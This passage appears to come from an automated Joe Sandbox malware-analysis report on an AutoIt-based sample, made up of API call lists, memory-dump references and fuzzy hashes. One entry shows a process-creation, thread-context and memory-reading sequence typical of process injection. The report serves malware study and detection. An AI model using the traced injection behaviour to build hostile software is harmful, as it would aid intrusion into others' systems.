                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID:
                                    • API String ID: 1385522511-0
                                    • Opcode ID: 5e2bf49083eec8f324a0ca6edef8ad776810ff67e75496d857fb47be1d0bd5c3
                                    • Instruction ID: 6f65e029706a550975ac3baeaae1f00da6608d24f765b60e5ad5574735dee428
                                    • Opcode Fuzzy Hash: 5e2bf49083eec8f324a0ca6edef8ad776810ff67e75496d857fb47be1d0bd5c3
                                    • Instruction Fuzzy Hash: 97329874A40209DFDB24EF54C898BBEB7B9FB45310F18805AE905AB361D77CAD81CB91
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01E41A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E41AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E41B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                    • Instruction ID: 8df4d2fa04d0cbd9298f5866aaeabcb4f98fa7375f459361a2ae3a446e7b6973
                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                    • Instruction Fuzzy Hash: CF12CE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A5F81CB5A
                                    APIs
                                      • Part of subcall function 00784E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E9C
                                      • Part of subcall function 00784E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784EAE
                                      • Part of subcall function 00784E90: FreeLibrary.KERNEL32(00000000,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EC0
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EFD
                                      • Part of subcall function 00784E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E62
                                      • Part of subcall function 00784E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784E74
                                      • Part of subcall function 00784E59: FreeLibrary.KERNEL32(00000000,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressFreeProc
                                    • String ID:
                                    • API String ID: 2632591731-0
                                    • Opcode ID: ecd8f578b12022336ef431d4c5649e927c8d7c70bcc96669b3fd5e44e1cd9ecb
                                    • Instruction ID: 6c8b4983fb4438c2dca0a1dd29ef903d75604ef6d494188d63722dc2fe602d54
                                    • Opcode Fuzzy Hash: ecd8f578b12022336ef431d4c5649e927c8d7c70bcc96669b3fd5e44e1cd9ecb
                                    • Instruction Fuzzy Hash: D411E332680206EACB24BF60DC0AFAD77A5AF50714F10842EF642E61C1EEB89A459750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 1a0c6c2ea0193c60d964adf59470325d07830223af05d36ac85b8b3ea00208fe
                                    • Instruction ID: b8fc2efad14384001d12aac3aa4f1467f8cd929b741375b0b8d61070e0f3ac57
                                    • Opcode Fuzzy Hash: 1a0c6c2ea0193c60d964adf59470325d07830223af05d36ac85b8b3ea00208fe
                                    • Instruction Fuzzy Hash: D511187590420AEFCF05DF58E945ADA7BF9EF48314F104059FC08AB312DA35EA15CBA5
                                    APIs
                                      • Part of subcall function 007B4C7D: RtlAllocateHeap.NTDLL(00000008,00781129,00000000,?,007B2E29,00000001,00000364,?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?), ref: 007B4CBE
                                    • _free.LIBCMT ref: 007B506C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                    • Instruction ID: 793e4fe095d2a6cfc7dce296d362014094106de55adfff95eb6ce9c8f7769386
                                    • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                    • Instruction Fuzzy Hash: 8E014972204705ABE3319F65D885BDAFBECFB89370F25061DE184932C0EA34A805C7B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                    • Instruction ID: 93d2873df8c22f06f82c3dd37f0fde5823a5955362d22cac4482d52842a62d02
                                    • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                    • Instruction Fuzzy Hash: 4BF0F432511A10EAD6313A698C0DB9A339C9FD3334F100B25F525921D2DB7CE8028AA6
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID:
                                    • API String ID: 176396367-0
                                    • Opcode ID: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                    • Instruction ID: c327a889b176afe1034a03905bcc77f0b0ab32e2ca6d9b1967f39e12ce3a1322
                                    • Opcode Fuzzy Hash: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                    • Instruction Fuzzy Hash: 49F0C8B3640600BED714AF38D80AA67BB98EB84760F14862AF619CB1D1DB75E51087E4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00781129,00000000,?,007B2E29,00000001,00000364,?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?), ref: 007B4CBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 8a72e1fd5eeb5cee31e2cfa5bd1d75bff76d31701d6f1a48ca3151b31ad37dea
                                    • Instruction ID: 9dfc905487685fbbdb49c40aead266f1fe21df8a0d810ad9bce7e877f21f88a1
                                    • Opcode Fuzzy Hash: 8a72e1fd5eeb5cee31e2cfa5bd1d75bff76d31701d6f1a48ca3151b31ad37dea
                                    • Instruction Fuzzy Hash: 3DF0B432646224A6DB215F629C09BDA3F88BF81FA1B145221F819E6283DA7DDC0046F0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 4991a778178ee350a1a02d2aa410007a039a858890f7d7c6f3e84efdcc2d1ba9
                                    • Instruction ID: 140bf611b8d256a4d72cbb645018b46c1f62fcf13a4373c645ca042c539e5ca5
                                    • Opcode Fuzzy Hash: 4991a778178ee350a1a02d2aa410007a039a858890f7d7c6f3e84efdcc2d1ba9
                                    • Instruction Fuzzy Hash: 53E06532141224AAE72126AA9C09BDA3649BF827B1F160132BC15D6591DB5DDD8181F2
                                    APIs
                                    • _free.LIBCMT ref: 007B4D9C
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                    • Instruction ID: d13cecc913d2cc926a0e4e67ca951ee0edb0509c0c80aff29b3468503e124169
                                    • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                    • Instruction Fuzzy Hash: 67E06D36201205AF8720CE6CD400AC2B7F4EF843207208929F99DD3221D331E812CB80
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784F6D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 85d78b2dc6a3c6dc3854ac5edcbba2d2e945554f4febaf3d8feb2dd291754fe7
                                    • Instruction ID: 43a6a5dc3948bd73570899780234f3fef838f0b8e12de4fda3460462bb8263a2
                                    • Opcode Fuzzy Hash: 85d78b2dc6a3c6dc3854ac5edcbba2d2e945554f4febaf3d8feb2dd291754fe7
                                    • Instruction Fuzzy Hash: CEF03971185752DFDB34AF64D494822BBE4BF143293298A7EE2EA82621C7B99844DF10
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00782DC4
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LongNamePath_wcslen
                                    • String ID:
                                    • API String ID: 541455249-0
                                    • Opcode ID: 7a11a4ccf55db1f7082f354473589ef0f45316dc4e2db054969242b2b9c87a53
                                    • Instruction ID: 7c55568eea49f25517a11029ef61db046a3315f96b1bdf2977f6bf38cbec0bbb
                                    • Opcode Fuzzy Hash: 7a11a4ccf55db1f7082f354473589ef0f45316dc4e2db054969242b2b9c87a53
                                    • Instruction Fuzzy Hash: 59E0CD726002245BC710A2589C09FDA77DDDFC8790F044075FD09D7248DA74ED808650
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                    • Instruction ID: a3c427b754884b08a80f92b86c1bd0bc95bc3691ba45e35b7574f08db2427a1d
                                    • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                    • Instruction Fuzzy Hash: AEE04FB0609B009FDF395A28A8517B677E89F4A300F00086EF69BC2753E57668468A4D
                                    APIs
                                      • Part of subcall function 00783837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00783908
                                      • Part of subcall function 0078D730: GetInputState.USER32 ref: 0078D807
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00782B6B
                                      • Part of subcall function 007830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0078314E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                    • String ID:
                                    • API String ID: 3667716007-0
                                    • Opcode ID: 65ac6fca95d678915477a0d9095d2830c7e2f0f4741cc05194463765654ad000
                                    • Instruction ID: 70dbd1a3a14be2462259cb4264583e4419cffd5c1b4297393aba167d6f511262
                                    • Opcode Fuzzy Hash: 65ac6fca95d678915477a0d9095d2830c7e2f0f4741cc05194463765654ad000
                                    • Instruction Fuzzy Hash: DBE0862138424486CA04BB78A85E5BDE75AABD1756F40153EF542871A3DE2D49494362
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000000,?,007C0704,?,?,00000000,?,007C0704,00000000,0000000C), ref: 007C03B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: fdaaa30225f41ea6388f2ce9044703ff18541944c1b8b3c1e3a2e693e2b4d864
                                    • Instruction ID: 9dc06771c23ebd250227153eda3c64cdbd1e06d2324642f76bb3d3d639122f42
                                    • Opcode Fuzzy Hash: fdaaa30225f41ea6388f2ce9044703ff18541944c1b8b3c1e3a2e693e2b4d864
                                    • Instruction Fuzzy Hash: B3D06C3208010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C732E821AB90
                                    APIs
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00781CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem
                                    • String ID:
                                    • API String ID: 3098949447-0
                                    • Opcode ID: e662abfba1c46d715680271fe62f6f049c4a595b865f92e76f46483eb8053551
                                    • Instruction ID: ba9fd918a3a1ee24f1f0efa8cf12503ca89145963ed76ea455b04207c90883d1
                                    • Opcode Fuzzy Hash: e662abfba1c46d715680271fe62f6f049c4a595b865f92e76f46483eb8053551
                                    • Instruction Fuzzy Hash: 04C092362C0304AFF6158B80BC5EF90776AB748B02F048401F609A96F3D7AA2820EA50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b50a73eebcabff6fa5980cc8c3c983ff4939ef0b50101766e3d8035fae5b8d55
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: FD31D275A00109DBCB18DF69E490969FBA6FF4A300B24C6A5E809CB656D735EDC1CBD0
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: e31b8103e200a6fcf0bd70c1ff725fd5399b0ab31fddb08d3cfcc00ef736263f
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: FAE0BF7494010EEFDB00EFA4E5496DE7BB4EF04711F1005A1FD05D7681DB309E548A66
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 5e7da06aa7f33a58a24857da89a430eb2fd2b9a3687a8590714bf875eef781cc
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: ACE0E67494010EDFDB00EFB4D54969E7FB4EF04701F100161FD01D2281D6309D508A72
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0081961A
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081965B
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0081969F
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008196C9
                                    • SendMessageW.USER32 ref: 008196F2
                                    • GetKeyState.USER32(00000011), ref: 0081978B
                                    • GetKeyState.USER32(00000009), ref: 00819798
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008197AE
                                    • GetKeyState.USER32(00000010), ref: 008197B8
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008197E9
                                    • SendMessageW.USER32 ref: 00819810
                                    • SendMessageW.USER32(?,00001030,?,00817E95), ref: 00819918
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0081992E
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00819941
                                    • SetCapture.USER32(?), ref: 0081994A
                                    • ClientToScreen.USER32(?,?), ref: 008199AF
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008199BC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008199D6
                                    • ReleaseCapture.USER32 ref: 008199E1
                                    • GetCursorPos.USER32(?), ref: 00819A19
                                    • ScreenToClient.USER32(?,?), ref: 00819A26
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00819A80
                                    • SendMessageW.USER32 ref: 00819AAE
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00819AEB
                                    • SendMessageW.USER32 ref: 00819B1A
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00819B3B
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00819B4A
                                    • GetCursorPos.USER32(?), ref: 00819B68
